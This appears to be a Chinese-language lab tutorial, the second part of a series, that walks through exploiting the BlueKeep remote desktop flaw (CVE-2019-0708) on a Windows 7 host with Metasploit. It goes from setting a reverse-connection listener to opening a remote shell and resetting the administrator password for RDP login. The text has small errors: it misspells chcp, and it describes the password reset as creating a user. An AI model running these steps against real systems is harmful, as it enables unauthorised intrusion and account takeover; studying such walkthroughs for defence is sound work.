白帽子黑客带你:远程桌面漏洞利用与Win7计算机攻防实战下集

课前声明:
本分享仅做学习交流 , 请自觉遵守法律法规!搜索:Kali与编程 , 学习更多网络攻防干货!下篇文章将在明天下午五点发布 , 敬请关注!
白帽子黑客带你:远程桌面漏洞利用与Win7计算机攻防实战下集文章插图
二、战略安排
2.1 打开Metasploit渗透框架 , 如下如所示 。
命令:msfconsole
白帽子黑客带你:远程桌面漏洞利用与Win7计算机攻防实战下集文章插图
2.2 检索有关远程桌面的已知漏洞 , 如下图所示 。
命令:search 0708
白帽子黑客带你:远程桌面漏洞利用与Win7计算机攻防实战下集文章插图
2.3 使用检索到的关于远程桌面的漏洞利用模块 , 如下图所示 。
命令:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
白帽子黑客带你:远程桌面漏洞利用与Win7计算机攻防实战下集文章插图
2.4 查看攻击目标需要设置的参数 , 如下图所示 。
命令:show targets
白帽子黑客带你:远程桌面漏洞利用与Win7计算机攻防实战下集文章插图
2.5 设置相关攻击参数 , 如下图所示 。
命令:set rhosts 192.168.0.106
set lhost 192.168.0.102
set target 4
白帽子黑客带你:远程桌面漏洞利用与Win7计算机攻防实战下集文章插图
白帽子黑客带你:远程桌面漏洞利用与Win7计算机攻防实战下集文章插图
2.6 执行漏洞攻击模块 , 如下图所示 。
命令:run
白帽子黑客带你:远程桌面漏洞利用与Win7计算机攻防实战下集文章插图
白帽子黑客带你:远程桌面漏洞利用与Win7计算机攻防实战下集文章插图
2.7 利用建立起来的会话查看受害者主机系统的相关信息 , 如下图所示 。
命令:sysinfo
白帽子黑客带你:远程桌面漏洞利用与Win7计算机攻防实战下集文章插图
2.8 利用建立起来的会话查看受害者主机系统的相关信息 , 如下图所示 。
命令:ipconfig
白帽子黑客带你:远程桌面漏洞利用与Win7计算机攻防实战下集文章插图
2.9 查看会话命令帮助信息 , 如下图所示 。
命令:?
白帽子黑客带你:远程桌面漏洞利用与Win7计算机攻防实战下集文章插图
2.10 进入受害者主机cmd界面并解决乱码问题 , 如下图所示 。
命令:shell
chnp 65001
白帽子黑客带你:远程桌面漏洞利用与Win7计算机攻防实战下集文章插图
2.11 利用“whoami”命令查看相关信息 , 如下图所示 。
命令;whoami
白帽子黑客带你:远程桌面漏洞利用与Win7计算机攻防实战下集文章插图
2.12 利用cmd命令在受害者主机创建一个新用户 , 如下图所示 。
命令:net user administrator 123456
白帽子黑客带你:远程桌面漏洞利用与Win7计算机攻防实战下集文章插图
2.13 利用图形化远程桌面登录工具登录受害者主机 , 如下图所示 。
白帽子黑客带你:远程桌面漏洞利用与Win7计算机攻防实战下集文章插图
白帽子黑客带你:远程桌面漏洞利用与Win7计算机攻防实战下集文章插图
白帽子黑客带你:远程桌面漏洞利用与Win7计算机攻防实战下集文章插图


推荐阅读